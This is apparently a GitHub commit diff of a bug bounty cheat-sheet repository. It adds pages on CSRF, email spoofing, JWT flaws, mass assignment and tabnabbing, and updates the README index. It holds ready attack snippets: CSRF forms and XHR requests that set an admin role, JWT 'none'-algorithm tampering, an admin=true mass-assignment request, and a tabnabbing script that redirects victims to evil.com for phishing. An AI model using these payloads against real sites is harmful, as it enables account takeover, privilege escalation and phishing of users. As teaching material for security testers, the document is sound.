🤬
  • ■ ■ ■ ■ ■ ■
    Bypass/Bypass CSRF.md Cross Site Request Forgery.md
    1  -# Bypass CSRF Token
     1 +# Cross Site Request Forgery (CSRF)
     2 +## Introduction
     3 +Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
     4 + 
     5 +## How to Find
     6 + 
     7 +1. HTML GET Method
     8 + 
     9 +```html
     10 +<a href="http://www.example.com/api/setusername?username=uname">Click Me</a>
     11 +```
     12 + 
     13 +2. HTML POST Method
     14 + 
     15 +```html
     16 +<form action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
     17 + <input name="username" type="hidden" value="uname" />
     18 + <input type="submit" value="Submit Request" />
     19 +</form>
     20 +```
     21 + 
     22 +3. JSON GET Method
     23 +```html
     24 +<script>
     25 +var xhr = new XMLHttpRequest();
     26 +xhr.open("GET", "http://www.example.com/api/currentuser");
     27 +xhr.send();
     28 +</script>
     29 +```
     30 + 
     31 +4. JSON POST Method
     32 +```html
     33 +<script>
     34 +var xhr = new XMLHttpRequest();
     35 +xhr.open("POST", "http://www.example.com/api/setrole");
     36 +xhr.withCredentials = true;
     37 +xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
     38 +xhr.send('{"role":admin}');
     39 +</script>
     40 +```
     41 + 
     42 +## Bypass CSRF Token
    2 43  1. Change single character
    3 44  ```
    4 45  POST /register HTTP/1.1
    skipped 116 lines
  • ■ ■ ■ ■
    Exposed Source Code.md
    skipped 1 lines
    2 2   
    3 3  ## **Introduction**
    4 4  Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.
    5  -## **How to Find**
    6 5   
     6 +## **How to Find**
    7 7  1. Exposed Git folder
    8 8  ```
    9 9  https://site.com/.git
    skipped 23 lines
  • ■ ■ ■ ■ ■ ■
    Misc/Email Spoofing.md
     1 +# Email Spoofing
     2 +## Introduction
     3 +Email spoofing is a technique used in spam and phishing attacks to trick users into thinking a message came from a person or entity they either know or can trust. In spoofing attacks, the sender forges email headers so that client software displays the fraudulent sender address, which most users take at face value.
     4 + 
     5 +## How to Find
     6 +1. Check the SPF records, if the website don't have a SPF record, the website must be vulnerable to email spoofing
     7 +```
     8 +v=spf1 include:_spf.google.com ~all
     9 +```
     10 +2. Check the DMARC records, if the website don't have a DMARC record or the value of tag policy is `none`, the website must be vulnerable to email spoofing
     11 +```
     12 +v=DMARC1; p=none; rua=mailto:[email protected]
     13 +```
     14 + 
     15 +Reference:
     16 +- [Hackerone #1071521](https://hackerone.com/reports/1071521)
  • ■ ■ ■ ■ ■ ■
    Misc/JWT Vulnerabilities.md
     1 +# JWT Vulnerabilities
     2 +## Introduction
     3 +JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object.
     4 + 
     5 +## How to Exploit
     6 +1. Modify the algorithm to "none" algorithm
     7 +```
     8 +{
     9 + "alg": "none",
     10 + "typ": "JWT"
     11 +}
     12 +```
     13 +2. Modify the algorithm RS256 to HS256
     14 + 
     15 +If you change the algorithm from RS256 to HS256, the backend code uses the public key as the secret key and then uses the HS256 algorithm to verify the signature.
     16 + 
     17 +3. Bruteforce HS256
     18 +
     19 +the HS256 key strength is weak, it can be directly brute-forced, such as using the secret string as a key in the PyJWT library sample code.
     20 + 
     21 +Reference:
     22 +- [Hacking JSON Web Token (JWT)](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
  • ■ ■ ■ ■ ■ ■
    Misc/Mass Assignment.md
     1 +# Mass Assignment Attack
     2 +## Introduction
     3 +Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS
     4 + 
     5 +## How to Exploit
     6 +- Normal request
     7 +```
     8 +POST /editdata
     9 +Host: vuln.com
     10 + 
     11 +username=daffa
     12 +```
     13 +```
     14 +HTTP/1.1 200 OK
     15 +...
     16 + 
     17 +username=daffa&admin=false
     18 +```
     19 + 
     20 +- Modified Request
     21 +```
     22 +POST /editdata
     23 +Host: vuln.com
     24 + 
     25 +username=daffa&admin=true
     26 +```
     27 + 
     28 +```
     29 +HTTP/1.1 200 OK
     30 +...
     31 + 
     32 +username=daffa&admin=true
     33 +```
  • ■ ■ ■ ■ ■ ■
    Misc/Tabnabbing.md
     1 +# Tabnabbing
     2 +## Introduction
     3 +When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property.
     4 + 
     5 +## How to Find
     6 +```html
     7 +<a href="..." target="_blank" rel="" />
     8 + 
     9 +<a href="..." target="_blank" />
     10 +```
     11 + 
     12 +## How to Exploit
     13 +1. Attacker posts a link to a website under his control that contains the following JS code:
     14 + ```html
     15 + <html>
     16 + <script>
     17 + if (window.opener) window.opener.parent.location.replace('http://evil.com');
     18 + if (window.parent != window) window.parent.location.replace('http://evil.com');
     19 + </script>
     20 + </html>
     21 + ```
     22 +2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
     23 +3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.
  • ■ ■ ■ ■ ■
    README.md
    skipped 2 lines
    3 3   
    4 4  ## List
    5 5  - [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
     6 +- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
    6 7  - [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
    7 8  - [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
    8 9  - [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
    skipped 4 lines
    13 14  ## List Bypass
    14 15  - [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
    15 16  - [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
    16  -- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
    17 17  - [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
    18 18  - [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md)
    19 19  - [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md)
    skipped 7 lines
    27 27   
    28 28  ## Miscellaneous
    29 29  - [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
     30 +- [Broken Link Hijacking](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Broken%20Link%20Hijacking.md)
     31 +- [Email Spoofing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Email%20Spoofing.md)
     32 +- [JWT Vulnerabilities](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/JWT%20Vulnerabilities.md)
     33 +- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md)
    30 34  - [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
     35 +- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
    31 36  - [Unauthenticated Jira CVE](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
    32 37   
    33 38  ## Reconnaissance
    skipped 6 lines
Please wait...
Page is in error, reload to recover